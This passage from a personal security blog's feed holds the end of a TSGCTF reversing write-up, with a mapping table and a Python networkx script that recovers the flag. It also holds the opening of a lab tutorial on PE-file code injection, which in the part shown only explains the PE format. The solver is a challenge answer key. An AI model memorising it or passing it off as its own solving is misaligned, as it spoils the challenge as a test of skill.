class="line"><span class="string">&quot;y-&quot;: &quot;(k)(z)(r)FAA&quot;</span></span><br><span class="line"><span class="string">&quot;-o&quot;: &quot;(b)(l)(z)GGC&quot;</span></span><br><span class="line"><span class="string">&quot;p1&quot;: &quot;(t)(d)(x)QOB&quot;</span></span><br><span class="line"><span class="string">&quot;zr&quot;: &quot;(b)(c)(e)UKO&quot;</span></span><br><span class="line"><span class="string">&quot;ut&quot;: &quot;(p)(l)(u)WSO&quot;</span></span><br><span class="line"><span class="string">&quot;a9&quot;: &quot;(b)(t)(i)FGA&quot;</span></span><br><span class="line"><span class="string">&quot;im&quot;: &quot;(l)(e)(n)MJO&quot;</span></span><br><span class="line"><span class="string">&quot;fj&quot;: &quot;zOJM&quot;</span></span><br><span class="line"><span class="string">&quot;kd&quot;: &quot;nSTM&quot;</span></span><br><span class="line"><span class="string">&quot;6a&quot;: &quot;fWLM&quot;</span></span><br><span class="line"><span class="string">&quot;gs&quot;: &quot;(z)(z)(l)ITB&quot;</span></span><br><span class="line"><span class="string">&quot;nw&quot;: &quot;(h)(i)(g)QJK&quot;</span></span><br><span class="line"><span class="string">&quot;yn&quot;: &quot;(m)(t)(s)ITB&quot;</span></span><br><span class="line"><span class="string">&quot;ht&quot;: &quot;fVDM&quot;</span></span><br><span class="line"><span class="string">&quot;mp&quot;: &quot;(l)(d)(m)ULP&quot;</span></span><br><span class="line"><span class="string">&quot;61&quot;: &quot;(u)(t)(d)QVO&quot;</span></span><br><span class="line"><span class="string">&quot;pb&quot;: &quot;(r)(w)(d)RXQ&quot;</span></span><br><span class="line"><span class="string">&quot;fw&quot;: &quot;(p)(z)(k)&quot;</span></span><br><span class="line"><span class="string">&quot;bf&quot;: &quot;(a)(h)(f)JTO&quot;</span></span><br><span class="line"><span class="string">&quot;jr&quot;: &quot;(p)(x)(f)XRZ&quot;</span></span><br><span class="line"><span class="string">&quot;ur&quot;: &quot;(k)(v)(p)MHC&quot;</span></span><br><span class="line"><span class="string">&quot;58&quot;: &quot;(l)(e)(n)TQV&quot;</span></span><br><span class="line"><span class="string">&quot;35&quot;: &quot;(z)(z)(l)FGA&quot;</span></span><br><span class="line"><span class="string">&quot;pz&quot;: &quot;(m)(t)(s)AQH&quot;</span></span><br><span class="line"><span class="string">&quot;x1&quot;: &quot;(s)(o)(r)OJM&quot;</span></span><br><span class="line"><span class="string">&quot;wm&quot;: &quot;(v)(g)(h)EPV&quot;</span></span><br><span class="line"><span class="string">&quot;j1&quot;: &quot;(m)(s)(w)AZF&quot;</span></span><br><span class="line"><span class="string">&quot;68&quot;: &quot;(k)(j)(q)WSO&quot;</span></span><br><span class="line"><span class="string">&quot;-8&quot;: &quot;(l)(a)(o)PZK&quot;</span></span><br><span class="line"><span class="string">&quot;9b&quot;: &quot;(a)(a)(f)&quot;</span></span><br><span class="line"><span class="string">&quot;mw&quot;: &quot;(v)(r)(l)FAL&quot;</span></span><br><span class="line"><span class="string">&quot;1g&quot;: &quot;(d)(j)(p)EPV&quot;</span></span><br><span class="line"><span class="string">&quot;fa&quot;: &quot;(h)(h)(e)SEF&quot;</span></span><br><span class="line"><span class="string">&quot;vt&quot;: &quot;(t)(x)(u)&quot;</span></span><br><span class="line"><span class="string">&quot;qo&quot;: &quot;(i)(d)(t)BBC&quot;</span></span><br><span class="line"><span class="string">&quot;md&quot;: &quot;(l)(d)(m)RBJ&quot;</span></span><br><span class="line"><span class="string">&quot;2z&quot;: &quot;(r)(w)(d)MDL&quot;</span></span><br><span class="line"><span class="string">&quot;zp&quot;: &quot;(u)(n)(a)EPV&quot;</span></span><br><span class="line"><span class="string">&quot;xp&quot;: &quot;(i)(y)(a)RUH&quot;</span></span><br><span class="line"><span class="string">&quot;88&quot;: &quot;(t)(x)(u)PVE&quot;</span></span><br><span class="line"><span class="string">&quot;hm&quot;: &quot;(o)(t)(j)&quot;</span></span><br><span class="line"><span class="string">&quot;98&quot;: &quot;(n)(h)(m)NOD&quot;</span></span><br><span class="line"><span class="string">&quot;5l&quot;: &quot;(b)(b)(c)ZIK&quot;</span></span><br><span class="line"><span class="string">&quot;eu&quot;: &quot;(o)(l)(q)XRZ&quot;</span></span><br><span class="line"><span class="string">&quot;93&quot;: &quot;(n)(c)(e)WOY&quot;</span></span><br><span class="line"><span class="string">&quot;yf&quot;: &quot;(h)(q)(p)WLM&quot;</span></span><br><span class="line"><span class="string">&quot;tq&quot;: &quot;mAZF&quot;</span></span><br><span class="line"><span class="string">&quot;fk&quot;: &quot;(y)(o)(w)YMC&quot;</span></span><br><span class="line"><span class="string">&quot;zs&quot;: &quot;(u)(t)(d)&quot;</span></span><br><span class="line"><span class="string">&quot;em&quot;: &quot;(g)(y)(f)DPL&quot;</span></span><br><span class="line"><span class="string">&quot;-z&quot;: &quot;(o)(y)(y)PVK&quot;</span></span><br><span class="line"><span class="string">&quot;od&quot;: &quot;(n)(h)(m)JTO&quot;</span></span><br><span class="line"><span class="string">&quot;2u&quot;: &quot;(b)(d)(v)JKS&quot;</span></span><br><span class="line"><span class="string">&quot;rk&quot;: &quot;(l)(a)(o)HYA&quot;</span></span><br><span class="line"><span class="string">&quot;ud&quot;: &quot;(n)(w)(s)&quot;</span></span><br><span class="line"><span class="string">&quot;-u&quot;: &quot;lPVR&quot;</span></span><br><span class="line"><span class="string">&quot;ya&quot;: &quot;(l)(e)(n)&quot;</span></span><br><span class="line"><span class="string">&quot;8t&quot;: &quot;(c)(g)(n)LGI&quot;</span></span><br><span class="line"><span class="string">&quot;-y&quot;: &quot;(s)(y)(n)&quot;</span></span><br><span class="line"><span class="string">&quot;vw&quot;: &quot;(p)(z)(l)REW&quot;</span></span><br><span class="line"><span class="string">&quot;1q&quot;: &quot;(k)(z)(r)&quot;</span></span><br><span class="line"><span class="string">&quot;er&quot;: &quot;pYNV&quot;</span></span><br><span class="line"><span class="string">&quot;m9&quot;: &quot;(w)(s)(p)KZP&quot;</span></span><br><span class="line"><span class="string">&quot;1p&quot;: &quot;(j)(y)(g)NYS&quot;</span></span><br><span class="line"><span class="string">&quot;pt&quot;: &quot;(r)(v)(p)LGI&quot;</span></span><br><span class="line"><span class="string">&quot;v7&quot;: &quot;(m)(t)(s)XIU&quot;</span></span><br><span class="line"><span class="string">&quot;72&quot;: &quot;(u)(c)(f)CRV&quot;</span></span><br><span class="line"><span class="string">&quot;zk&quot;: &quot;(a)(v)(r)XRZ&quot;</span></span><br><span class="line"><span class="string">&quot;ca&quot;: &quot;(o)(a)(a)DTI&quot;</span></span><br><span class="line"><span class="string">&quot;wx&quot;: &quot;(c)(z)(b)WSO&quot;</span></span><br><span class="line"><span class="string">&quot;3h&quot;: &quot;(u)(c)(f)DAM&quot;</span></span><br><span class="line"><span class="string">&quot;2l&quot;: &quot;(e)(f)(z)&quot;</span></span><br><span class="line"><span class="string">&quot;xy&quot;: &quot;(v)(t)(i)&quot;</span></span><br><span class="line"><span class="string">&quot;tp&quot;: &quot;(m)(d)(v)EJW&quot;</span></span><br><span class="line"><span class="string">&quot;k4&quot;: &quot;(b)(q)(t)JIF&quot;</span></span><br><span class="line"><span class="string">&quot;7m&quot;: &quot;(a)(a)(f)&quot;</span></span><br><span class="line"><span class="string">&quot;tv&quot;: &quot;(f)(p)(x)VVT&quot;</span></span><br><span class="line"><span class="string">&quot;pd&quot;: &quot;(e)(v)(p)&quot;</span></span><br><span class="line"><span class="string">&quot;ue&quot;: &quot;(b)(x)(u)OAL&quot;</span></span><br><span class="line"><span class="string">&quot;ef&quot;: &quot;(h)(q)(p)XZI&quot;</span></span><br><span class="line"><span class="string">&quot;ok&quot;: &quot;(j)(y)(g)NTN&quot;</span></span><br><span class="line"><span class="string">&quot;tw&quot;: &quot;(r)(f)(t)EHH&quot;</span></span><br><span class="line"><span class="string">&quot;8f&quot;: &quot;(b)(t)(i)LZZ&quot;</span></span><br><span class="line"><span class="string">&quot;-&quot;: &quot;(m)(l)(w)QJK&quot;</span></span><br><span class="line"><span class="string">&quot;0&quot;: &quot;(n)(h)(m)ITV&quot;</span></span><br><span class="line"><span class="string">&quot;u&quot;: &quot;(n)(h)(m)KZP&quot;</span></span><br><span class="line"><span class="string">&quot;i&quot;: &quot;(z)(r)(p)HGV&quot;</span></span><br><span class="line"><span class="string">&quot;8&quot;: &quot;(b)(x)(u)IUP&quot;</span></span><br><span class="line"><span class="string">&quot;e&quot;: &quot;(c)(z)(b)UKO&quot;</span></span><br><span class="line"><span class="string">&quot;z&quot;: &quot;(o)(t)(f)PSW&quot;</span></span><br><span class="line"><span class="string">&quot;v&quot;: &quot;(z)(r)(p)KZP&quot;</span></span><br><span class="line"><span class="string">&quot;w&quot;: &quot;(p)(z)(k)NOD&quot;</span></span><br><span class="line"><span class="string">&quot;k&quot;: &quot;(p)(z)(k)PRZ&quot;</span></span><br><span class="line"><span class="string">&quot;d&quot;: &quot;(n)(j)(q)HGV&quot;</span></span><br><span class="line"><span class="string">&quot;5&quot;: &quot;(b)(x)(u)JGU&quot;</span></span><br><span class="line"><span class="string">&quot;p&quot;: &quot;(k)(z)(t)WSO&quot;</span></span><br><span class="line"><span class="string">&quot;m&quot;: &quot;(a)(q)(t)ZPZ&quot;</span></span><br><span class="line"><span class="string">&quot;o&quot;: &quot;(o)(t)(f)MHN&quot;</span></span><br><span class="line"><span class="string">&quot;h&quot;: &quot;(d)(o)(n)QJN&quot;</span></span><br><span class="line"><span class="string">&quot;2&quot;: &quot;(x)(a)(c)FSL&quot;</span></span><br><span class="line"><span class="string">&quot;c&quot;: &quot;(o)(s)(w)WLM&quot;</span></span><br><span class="line"><span class="string">&quot;a&quot;: &quot;(e)(f)(z)ZPZ&quot;</span></span><br><span class="line"><span class="string">&quot;y&quot;: &quot;(z)(r)(p)QJN&quot;</span></span><br><span class="line"><span class="string">&quot;x&quot;: &quot;(k)(j)(q)TZK&quot;</span></span><br><span class="line"><span class="string">&quot;4&quot;: &quot;(k)(z)(t)WLM&quot;</span></span><br><span class="line"><span class="string">&quot;j&quot;: &quot;(w)(s)(p)ITV&quot;</span></span><br><span class="line"><span class="string">&quot;q&quot;: &quot;(o)(t)(f)KZP&quot;</span></span><br><span class="line"><span class="string">&quot;l&quot;: &quot;(o)(s)(w)QJK&quot;</span></span><br><span class="line"><span class="string">&quot;t&quot;: &quot;(v)(n)(y)JIF&quot;</span></span><br><span class="line"><span class="string">&quot;7&quot;: &quot;(w)(v)(a)QJK&quot;</span></span><br><span class="line"><span class="string">&quot;s&quot;: &quot;(p)(z)(k)HGV&quot;</span></span><br><span class="line"><span class="string">&quot;1&quot;: &quot;(x)(m)(o)QJK&quot;</span></span><br><span class="line"><span class="string">&quot;g&quot;: &quot;(m)(l)(w)ECB&quot;</span></span><br><span class="line"><span class="string">&quot;3&quot;: &quot;(s)(o)(r)HMZ&quot;</span></span><br><span class="line"><span class="string">&quot;6&quot;: &quot;(v)(g)(h)MHN&quot;</span></span><br><span class="line"><span class="string">&quot;r&quot;: &quot;(d)(o)(n)PRZ&quot;</span></span><br><span class="line"><span class="string">&quot;b&quot;: &quot;(x)(m)(o)TZK&quot;</span></span><br><span class="line"><span class="string">&quot;f&quot;: &quot;(w)(v)(a)UKO&quot;</span></span><br><span class="line"><span class="string">&quot;9&quot;: &quot;(o)(t)(f)NOD&quot;</span></span><br><span class="line"><span class="string">&quot;n&quot;: &quot;(v)(g)(h)PRZ&quot;</span></span><br><span class="line"><span class="string">&#x27;&#x27;&#x27;</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> networkx <span class="keyword">as</span> nx</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">parse_edge</span>(<span class="params">right</span>):</span><br><span class="line"><span class="keyword">if</span> <span class="string">&#x27;a&#x27;</span> &lt;= right[<span class="number">0</span>] &lt;= <span class="string">&#x27;z&#x27;</span>:</span><br><span class="line"><span class="keyword">assert</span> <span class="built_in">all</span>(<span class="string">&#x27;A&#x27;</span> &lt;= i &lt;= <span class="string">&#x27;Z&#x27;</span> <span class="keyword">for</span> i <span class="keyword">in</span> right[<span class="number">1</span>: ]), right</span><br><span class="line"><span class="keyword">return</span> right[<span class="number">0</span>], right[<span class="number">1</span>: ]</span><br><span class="line"><span class="keyword">assert</span> right[<span class="number">0</span>] == <span class="string">&#x27;(&#x27;</span>, right</span><br><span class="line"><span class="keyword">assert</span> <span class="string">&#x27;a&#x27;</span> &lt;= right[<span class="number">1</span>] &lt;= <span class="string">&#x27;z&#x27;</span>, right</span><br><span class="line"><span class="keyword">assert</span> right[<span class="number">2</span>] == <span class="string">&#x27;)&#x27;</span>, right</span><br><span class="line"><span class="keyword">assert</span> right[<span class="number">3</span>] == <span class="string">&#x27;(&#x27;</span>, right</span><br><span class="line"><span class="keyword">assert</span> <span class="string">&#x27;a&#x27;</span> &lt;= right[<span class="number">4</span>] &lt;= <span class="string">&#x27;z&#x27;</span>, right</span><br><span class="line"><span class="keyword">assert</span> right[<span class="number">5</span>] == <span class="string">&#x27;)&#x27;</span>, right</span><br><span class="line"><span class="keyword">assert</span> right[<span class="number">6</span>] == <span class="string">&#x27;(&#x27;</span>, right</span><br><span class="line"><span class="keyword">assert</span> <span class="string">&#x27;a&#x27;</span> &lt;= right[<span class="number">7</span>] &lt;= <span class="string">&#x27;z&#x27;</span>, right</span><br><span class="line"><span class="keyword">assert</span> right[<span class="number">8</span>] == <span class="string">&#x27;)&#x27;</span>, right</span><br><span class="line">start = (right[<span class="number">7</span>] + right[<span class="number">4</span>] + right[<span class="number">1</span>]).upper()</span><br><span class="line"><span class="keyword">if</span> <span class="built_in">len</span>(right) == <span class="number">9</span>:</span><br><span class="line"><span class="keyword">return</span> start, <span class="string">&#x27;&#x27;</span></span><br><span class="line"><span class="keyword">assert</span> <span class="built_in">len</span>(right) == <span class="number">12</span>, right</span><br><span class="line"><span class="keyword">assert</span> <span class="built_in">all</span>(<span class="string">&#x27;A&#x27;</span> &lt;= i &lt;= <span class="string">&#x27;Z&#x27;</span> <span class="keyword">for</span> i <span class="keyword">in</span> right[<span class="number">9</span>: ]), right</span><br><span class="line"><span class="keyword">return</span> start, right[<span class="number">9</span>: ]</span><br><span class="line"></span><br><span class="line">G = nx.DiGraph()</span><br><span class="line">values_dict = &#123;&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> line <span class="keyword">in</span> lines.strip().splitlines():</span><br><span class="line">left, right = line.split(<span class="string">&#x27;: &#x27;</span>)</span><br><span class="line">left = <span class="built_in">eval</span>(left)</span><br><span class="line">right = <span class="built_in">eval</span>(right)</span><br><span class="line">start, end = parse_edge(right)</span><br><span class="line"><span class="keyword">if</span> start <span class="keyword">not</span> <span class="keyword">in</span> values_dict:</span><br><span class="line">values_dict[start] = &#123;&#125;</span><br><span class="line">values_dict[start][end] = left</span><br><span class="line">G.add_edge(start, end)</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">get_input</span>(<span class="params">char</span>):</span><br><span class="line">path = nx.shortest_path(G, char, <span class="string">&#x27;&#x27;</span>)</span><br><span class="line">out = <span class="string">&#x27;&#x27;</span></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="built_in">len</span>(path) - <span class="number">1</span>):</span><br><span class="line">out += values_dict[path[i]][path[i + <span class="number">1</span>]]</span><br><span class="line"><span class="keyword">return</span> out</span><br><span class="line"></span><br><span class="line">flag = []</span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="string">&#x27;TSGCTF&#x27;</span>[::-<span class="number">1</span>].lower():</span><br><span class="line">flag.append(get_input(i))</span><br><span class="line"></span><br><span class="line"><span class="built_in">print</span>(<span class="string">&#x27;TSGCTF&#123;%s&#125;&#x27;</span> % (<span class="string">&#x27;_&#x27;</span>.join(flag)))</span><br><span class="line"></span><br></pre></td></tr></table></figure><h2 id="参考资料"><a href="#参考资料" class="headerlink" title="参考资料"></a>参考资料</h2><p><a href="https://tan.hatenadiary.jp/entry/2024/12/16/013044">https://tan.hatenadiary.jp/entry/2024/12/16/013044</a></p>]]></content>
    
    
      
      
    <summary type="html">&lt;h2 id=&quot;Misbehave&quot;&gt;&lt;a href=&quot;#Misbehave&quot; class=&quot;headerlink&quot; title=&quot;Misbehave&quot;&gt;&lt;/a&gt;Misbehave&lt;/h2&gt;&lt;h3 id=&quot;题目分类：&quot;&gt;&lt;a href=&quot;#题目分类：&quot; class=&quot;header</summary>
      
    
    
    
    
    <category term="Re" scheme="https://github.com/xyy9233/xyy9233.github.io.git/tags/Re/"/>
    
  </entry>
  
  <entry>
    <title>软件安全实验1-6详解</title>
    <link href="https://github.com/xyy9233/xyy9233.github.io.git/2024/12/23/ruan-jian-an-quan/"/>
    <id>https://github.com/xyy9233/xyy9233.github.io.git/2024/12/23/ruan-jian-an-quan/</id>
    <published>2024-12-22T16:06:44.358Z</published>
    <updated>2025-01-08T07:20:01.534Z</updated>
    
    <content type="html"><![CDATA[<h1 id="软件安全实验1-6详解"><a href="#软件安全实验1-6详解" class="headerlink" title="软件安全实验1-6详解"></a>软件安全实验1-6详解</h1><p>太喜欢这门课，而且是越写实验越好玩！找到了《软件安全：漏洞利用及渗透测试》这本书，其中有更多的实验，打算在之后的寒假慢慢补上。</p><p>或许也是想给学弟学妹留下点什么，就结合了一些班里同学问过我的一些问题或者可能会出问题的点，打算详细的把这个实验 是什么、为什么、怎么做告诉大家。</p><p>同时也希望大家在实验过程中有一些自己的思考和感悟，欢迎批评指正。</p><h2 id="实验一：PE文件代码注入实验（winmine）"><a href="#实验一：PE文件代码注入实验（winmine）" class="headerlink" title="实验一：PE文件代码注入实验（winmine）"></a>实验一：<strong>PE</strong>文件代码注入实验（winmine）</h2><blockquote><p>通过本实验，预期达到以下实验目的：</p><ol><li><p>熟悉PE文件格式。</p></li><li><p>复习汇编语言常见指令。</p></li><li><p>学习查看，编辑，保存PE文件。</p></li><li><p>熟练使用LoadPE和OllyDbg调试工具。</p></li></ol></blockquote><h3 id="一．-实验步骤"><a href="#一．-实验步骤" class="headerlink" title="一．  实验步骤"></a><strong>一．</strong>  <strong>实验步骤</strong></h3><h4 id="1-首先了解PE文件格式："><a href="#1-首先了解PE文件格式：" class="headerlink" title="1. 首先了解PE文件格式："></a>1. 首先了解PE文件格式：</h4><p>查资料：PE 全称是 Portable Executable，即可移植的可执行文件，是 Windows 操作系统下可执行文件的总称，是用于存储可执行文件 (exe, scr)、动态链接库 (dll, oxc, cpl) 和驱动程序 (sys, vxd) 的标准文件格式。</p><p>PE 文件结构复杂而丰富，它包含了可执行文件的所有必要信息，以便操作系统正确加载和执行程序。</p><h5 id="通过这个扫雷程序了解PE文件结构："><a href="#通过这个扫雷程序了解PE文件结构：" class="headerlink" title="通过这个扫雷程序了解PE文件结构："></a><strong>通过这个扫雷程序了解PE文件结构：</strong></h5><h6 id="DOS头（DOS-Header-DOSStub）"><a href="#DOS头（DOS-Header-DOSStub）" class="headerlink" title="-  DOS头（DOS Header+ DOSStub）"></a>-  <strong>DOS</strong>头（DOS Header+ DOSStub）</h6><p>PE 文件的开头通常包含一个 DOS 头，用于向后兼容早期的 MS-DOS 操作系统，使得 DOS 识别出这是有效的执行体，然后运行紧随之后的是 DOS Stub</p><p>DOS Header 由一个 0x40 大小的 IMAGE_DOS_HEADER 结构体组成：</p><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">typedef</span> <span class="class"><span class="keyword">struct</span> _<span class="title">IMAGE_DOS_HEADER</span> &#123;</span>      <span class="comment">// DOS .EXE 文件头结构体</span></span><br><span class="line">    WORD   e_magic;       <span class="comment">// 标识符，用于确认这是MZ格式的文件，值为0x5A4D</span></span><br><span class="line">    WORD   e_cblp;                      <span class="comment">// 文件中最后一个扇区的字节数</span></span><br><span class="line">    WORD   e_cp;                        <span class="comment">// 文件中的扇区总数</span></span><br><span class="line">    WORD   e_crlc;                      <span class="comment">// 重定位表中的条目数</span></span><br><span class="line">    WORD   e_cparhdr;                   <span class="comment">// 文件头的大小，以16字节为单位</span></span><br><span class="line">    WORD   e_minalloc;               <span class="comment">// 程序加载时所需的最小额外内存段落数</span></span><br><span class="line">WORD   e_maxalloc;                <span class="comment">// 程序加载时所需的最大额外内存段落数</span></span><br><span class="line">WORD   e_ss;                        <span class="comment">// 初始堆栈段选择子（段地址）</span></span><br><span class="line">    WORD   e_sp;                        <span class="comment">// 初始堆栈指针值</span></span><br><span class="line">    WORD   e_csum;                      <span class="comment">// 校验和，用于检验文件的完整性</span></span><br><span class="line">    WORD   e_ip;                        <span class="comment">// 初始指令指针（IP值）</span></span><br><span class="line">    WORD   e_cs;                        <span class="comment">// 初始代码段选择子（段地址）</span></span><br><span class="line">    WORD   e_lfarlc;                    <span class="comment">// 文件中重定位表的偏移量</span></span><br><span class="line">    WORD   e_ovno;                      <span class="comment">// 覆盖号，用于实现覆盖功能</span></span><br><span class="line">    WORD   e_res[<span class="number">4</span>];                    <span class="comment">// 保留字段，供未来使用</span></span><br><span class="line">    WORD   e_oemid;                     <span class="comment">// OEM标识符，用于特定于OEM的扩展</span></span><br><span class="line">WORD   e_oeminfo;                   <span class="comment">// OEM信息，供OEM使用</span></span><br><span class="line">    WORD   e_res2[<span class="number">10</span>];                  <span class="comment">// 保留字段，供未来扩展使用</span></span><br><span class="line">    LONG   e_lfanew;       <span class="comment">// 指向新EXE（PE）头的偏移量，从文件开始处计算</span></span><br><span class="line">&#125; IMAGE_DOS_HEADER, *PIMAGE_DOS_HEADER;</span><br><span class="line"></span><br></pre></td></tr></table></figure><p>其中主要关注 e_magic 和 e_lfanew 这两个成员变量。e_magic 位于文件首，其值对应的 ASCII 为 MZ，标识该文件为可执行文件；e_lfanew 的值表示 PE 头的偏移地址</p><p><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/image-20250102110126597.png" alt="image-20250102110126597"></p><p>DOS Stub 在多数情况下由汇编器&#x2F;编译器<strong>自动生成</strong>，由代码和数据混合而成，大小不固定，在不支持 PE 文件格式的操作系统中，它将简单显示一个错误提示。不需要过多关注，在 Windows OS 下不会运行这部分代码，但在DOS环境中可以运行。</p><p>-  <strong>NT</strong>头</p><p>NT 头是 PE 文件的核心部分，也是 PE 头的一部分，包含了有关可执行文件的重要信息。PE 头的开始位置由 DOS 头中的 e_lfanew 字段指定。在 32 位下这个结构体由一个 0xf8 大小的 IMAGE_NT_HEADERS 结构体组成，该结构中包含了 PE 文件被载入内存时需要用到的重要域，该结构体的大小为0xf8字节，如下：</p><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">typedef</span> <span class="class"><span class="keyword">struct</span> _<span class="title">IMAGE_NT_HEADERS</span> &#123;</span></span><br><span class="line">    DWORD Signature;  <span class="comment">// PE签名，0x4字节</span></span><br><span class="line">    IMAGE_FILE_HEADER FileHeader;  <span class="comment">// PE头，0x14字节</span></span><br><span class="line">    IMAGE_OPTIONAL_HEADER32 OptionalHeader;  <span class="comment">// PE可选头</span></span><br><span class="line">&#125; IMAGE_NT_HEADERS32, *PIMAGE_NT_HEADERS32;</span><br><span class="line"></span><br></pre></td></tr></table></figure><p><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/image-20250102110145872.png" alt="image-20250102110145872"></p><p>50 45 00 00 PE签名</p><p>4C 01 CPUMachine码</p><p>03 00 节区数目</p><p>0B 01 之后是可选头</p><p>0B 01可选头类型</p><p>21 3E 程序入口</p><p>指向程序入口RVA</p><p>0x10C 镜像基址</p><p>0x110 0x114对齐大小</p><p>0x120主子系统版本号</p><p>0x128镜像中内存大小</p><h6 id="节表区："><a href="#节表区：" class="headerlink" title="-  节表区："></a>-  <strong>节表区：</strong></h6><p>*节表描述了 PE 文件中各个节的布局和属性，其位于 NT 头之后，也是 PE 头的最后一个部分：</p><p>*节区表记录了 PE 文件中所有节区的相关属性，节区表由一系列的 IMAGE_SECTION_HEADER 结构排列而成，每个结构用来描述一个节，结构的排列顺序和它们描述的节在文件中的排列顺序是一致的。全部有效结构的最后以一个空的 IMAGE_SECTION_HEADER 结构作为结束，所以节表中 IMAGE_SECTION_HEADER 结构数量等于节的数量加一。IMAGE_SECTION_HEADER 结构体大小为 0x28 字节</p><h6 id="PE-文件其余特定区域："><a href="#PE-文件其余特定区域：" class="headerlink" title="- PE 文件其余特定区域："></a><strong>- PE</strong> <strong>文件其余特定区域：</strong></h6><p>再继续往下便是真真正正的 text 节，data 节，rsrc 节。</p><p><strong>一个典型的PE文件中包含的节如下：</strong></p><p>（1）.text：由编译器产生，存放着二进制的机器代码，也是我们反汇编和调试的对象。</p><p>（2）.data: 初始化的数据块，如宏定义、全局变量、静态变量等。</p><p>（3）.idata：可执行文件所使用的动态链接库等外来函数与文件的信息, 即输入表。</p><p>（4）.rsrc: 存放程序的资源，如图标、菜单等。</p><p> 除此以外，还可能出现的节包括“.reloc”、“.edata”、“.tls”、“.rdata”等。</p><p># 数据目录表、导入表、导出表、资源表、重定位表、甚至还有其他自定义部分，如 TLS 表（线程局部存储表）、加载配置表 (Load Configuration Table) 等，这些部分包含了各种附加信息和配置…</p><p><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/image-20250102110154522.png" alt="image-20250102110154522"><img src="C:\Users\lenovo\AppData\Roaming\Typora\typora-user-images\image-20250102110159455.png" alt="image-20250102110159455"></p><h6 id="导入表-导出表"><a href="#导入表-导出表" class="headerlink" title="-  导入表&amp;导出表"></a>-  <strong>导入表&amp;导出表</strong></h6><p>在 Windows 程序逆向中，我们能从这两个表中获取到许多非常重要信息</p><p><strong>导入表（<strong><strong>IAT表）</strong></strong>：</strong></p><p>由于入口地址的不确定性，程序在不同的电脑上很有可能会出错，为了解决程序的兼容问题，操作系统就必须提供一些措施来确保程序可以在其他版本的Windows操作系统，以及DLL版本下也能正常运行。这时IAT表就应运而生了。</p><p>每个 exe 或者 dll 一般都会有它的导入表，记录了其自身会使用到的其他模块导出的函数。即记录调用了哪些模块 (dll)，以及调用了它里面的哪些函数</p><p>导入表的意义是确定 PE 文件依赖哪个模块的哪个函数，以及确定模块加载进内存后具体函数的地址一个导入表的大小是 0x14 字节， </p><p>  <strong>导入表跟导出表不同，导出表只有一个，里面有子表进行记录。而导入表是依赖每的一个模块都会有一个对应的导入表</strong></p><p><strong>导出表：</strong>记录导出符号的地址、名称、序号。一般来说<strong>需要提供功能的二进制程序（一般为 dll 文件）才会有导出表</strong>，可以通过导出表分析如下信息：</p><ol><li>此动态链接库文件提供了什么功能</li><li>向调用者提供输出函数（供使用者调用的函数）在模块中的起始地址</li></ol><p><strong>导入表中需要重点关注的三个成员：</strong></p><ul><li><strong>DUMMYUNIONNAME &amp; FirstThunk</strong><br> 这两个成员用于确定依赖的函数的名称。DUMMYUNIONNAME 指向 INT (导入名称表, Improt Name Table)；FirstThunk 指向 IAT（导入地址表, Improt Address Table, 类似 elf 的 GOT 表）</li></ul><p><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/image-20250102110208798.png" alt="image-20250102110208798"></p><ul><li><h6 id="Name"><a href="#Name" class="headerlink" title="Name"></a><strong>Name</strong></h6></li></ul><p>用于确定依赖的模块的名字。记录一个 RVA 地址，指向依赖的模块的名字（如”xx.dll”）这个字符串</p><p>在逆向分析中，我们可以通过 dll 名和 dll 导出函数的名字得到这个函数的地址，当然也可以通过代码获取，有很多 API 可供我们进行调用，如下</p><ol><li>通过     Loadlibrary(GetModelHandle) 将 dll 模块映射进内存并返回一个可以被 GetProcAddress 函数使用的句柄</li><li>利用 GetProcAddress     函数获得 dll 的加载地址，然后遍历导出表就可以得到函数地址</li></ol><h5 id="这里还需要提及的一个概念：虚拟内存："><a href="#这里还需要提及的一个概念：虚拟内存：" class="headerlink" title="-  这里还需要提及的一个概念：虚拟内存："></a>-  这里还需要提及的一个概念：<strong>虚拟内存：</strong></h5><p>* 在Windows系统中，在运行PE文件时，操作系统会自动加载该文件到内存，并为其映射出4GB的虚拟存储空间，然后继续运行，这就形成了所谓的进程空间。用户的PE文件被操作系统加载进内存后，PE对应的进程支配了自己独立的4GB虚拟空间。在这个空间中定位的地址称为虚拟内存地址（Virtual Address，VA）。</p><p>  静态分析工具看到的PE文件中某条指令位置是相对于磁盘文件而言的，即所外的文件偏移。而动态调试时，我们才能知道这条指令在内存中所处的位置，即虚拟内存地址</p><p><strong>PE文件地址和虚拟内存地址之间映射关系的几个重要概念：</strong></p><ul><li><p>文件偏移地址（File Offset）</p><p>数据在PE文件中的地址叫文件偏移地址，是文件在磁盘上存放时相对文件开头的偏移。</p></li><li><p>装载基址（Image Base）</p><p>PE装入内存时的基地址。默认情况下，EXE文件在内存中的基地址是0x00400000，DLL文件是0x10000000。这些位置可以通过修改编译选项更改。</p></li><li><p>虚拟内存地址（Virtual Address， VA）</p></li></ul><p>PE文件中的指令被装入内存后的地址。</p><ul><li>相对虚拟地址（Relative Virtual Address， 